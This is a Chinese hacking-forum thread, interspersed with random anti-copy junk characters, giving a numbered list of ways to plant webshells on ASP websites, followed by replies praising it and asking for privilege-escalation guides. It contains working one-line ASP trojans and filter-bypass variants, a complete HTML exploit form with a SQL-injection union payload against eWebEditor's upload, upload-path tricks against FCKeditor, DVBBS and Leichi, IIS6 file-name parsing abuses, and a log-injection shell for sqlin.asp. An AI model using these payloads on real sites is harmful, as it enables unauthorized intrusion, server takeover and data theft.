返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
2 V* i' t& ?  Z1 N- @+ F$ n/ k# M  |; o; N
2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp' b9 F& E4 {' m4 O5 N) w0 H8 @

: \; Q$ v2 \7 o9 U' K3 H$ p2 ~% l3.上传漏洞:1 \/ A3 i4 K9 H- b7 s' A

( C1 ^1 h& @' E) w$ Z/ Z动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x009 U% ?1 E" @" [! \, _
3 q8 j; A5 R5 Y5 x& d5 j( I9 `8 I
逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件
; N0 n5 n: j' S0 `  \" g9 g
* m/ V9 l  }) s: ]% r; `雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp! ]9 R7 s( x* x! }2 ]. B# W# z
然后在上传文件里面填要传的图片格式的ASP木马
! G- J1 M5 d  R' e1 q就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp! |+ t5 O/ b5 d3 l
4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传
0 d" o6 i) z8 j) ^! t$ S
- n9 A6 }: x  B" k3 A<html>
- Z* M5 q& [) Y* i<head>- h' [' o1 F; f+ \2 I9 F
<title>ewebeditor upload.asp上传利用</title>
2 E" T3 Z( q* w$ M+ u</head># R5 |0 [5 G+ Q% [
<body>
4 V4 ^" g) L0 @<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">
8 M# v3 p4 m0 q( [<input type=file name=uploadfile size=100><br><br>' x( z! P' x( N$ V$ t6 I- i: y
<input type=submit value=Fuck>
: n8 I$ V' @; b- K</form>
: T; B, M& @- J/ X4 ]1 \</body>6 D/ M' ^) _- P6 k1 i! l5 F
</form>, e5 q5 r% M& h4 y- ?. ~
</html>
8 k5 i2 {4 W" D5 x; F1 w% R5 j
3 b5 I8 h+ @, Q& u! T' |0 r5 e2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问
& P8 U7 E& s! I0 r: k% U. c9 |5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp' [& ~; a. x0 w+ p/ `
+ q  _. }3 L5 G  R0 a
利用windows2003解析。建立zjq.asp的文件夹. v( n9 K3 B4 P. m* c* h1 }

! w. Q/ `$ H4 M9 v/ d6 H3 b6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型
. U# ~! [9 g' r% L0 e, N: k6 A0 o1 x  \% A9 ~, w( @/ D
7.cuteeditor:类似ewebeditor' N$ ]- k2 `6 O5 B4 r& v- J$ \
9 L: A+ P7 f3 u1 R- w
8.htmleditor:同上" q: c, H2 e5 L# S- Y
4 N! v1 q0 I, a. }/ g  V6 |- S
9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破) _  C! Q' w' [" A  ~  V, T
9 x4 j$ n' [/ P6 Y  E' B" z; s, `
<%execute request("value")%><%'<% loop <%:%>3 _% J* w. w# s" a% `: M
" l+ W5 x1 Z7 b( {- m9 L' o
<%'<% loop <%:%><%execute request("value")%>
1 e' Z( ^1 @7 A3 O6 P) K9 q5 F
0 r  E5 U1 G, O3 G( P/ f<%execute request("value")'<% loop <%:%>5 y, w( }! h5 l
9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞5 b" m% z4 [+ }/ V

: ?- r3 `: x! D* o, h0 F; _10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞# T9 }5 Z0 v" f6 h

2 S1 K7 v$ T1 U  f  K11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3# |* R) ?& c' [* P, x. Z+ ?

9 ]# N7 e  A; f% [* h解析漏洞得到webshell7 r( l- b+ |: e" \" N" J
  v  ]) ?' x6 f/ l
12.mssql差异备份,日志备份,前提需知道web路径* j9 `! x* d; Z" L
( z/ J! Q; O" m( \6 n+ `
13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell! M4 c, A# Q: b8 o' V% e1 [1 y
2 n8 n8 M5 ?0 ]# @% @8 V
14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell4 J8 |6 e2 A8 N9 D0 s+ e# P
4 q2 X2 v% ~2 E7 |" |) W
15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可
" P: C+ g* O5 S) O7 x* l6 L4 u1 g3 V% E4 W" K& S3 x3 X$ F
以上只是本人的一些拙见,并不完善,以后想到了再继续添加5 E6 l& n' P2 I; p; p, w
不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520
& f5 Z" k4 d1 h0 N- q5 s' Z& o- V/ X& L4 i" s

7 K$ D% m' G% C: g8 D0 @很好啊、基本的入侵方法都包含了( X% e, g# O2 M& w+ a8 `" i$ c

& N5 F8 i7 h& `4 i7 c' I最好来个提权的帖子再。; D# l; G8 I& @' j3 t

" D+ E0 _1 ~" a不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表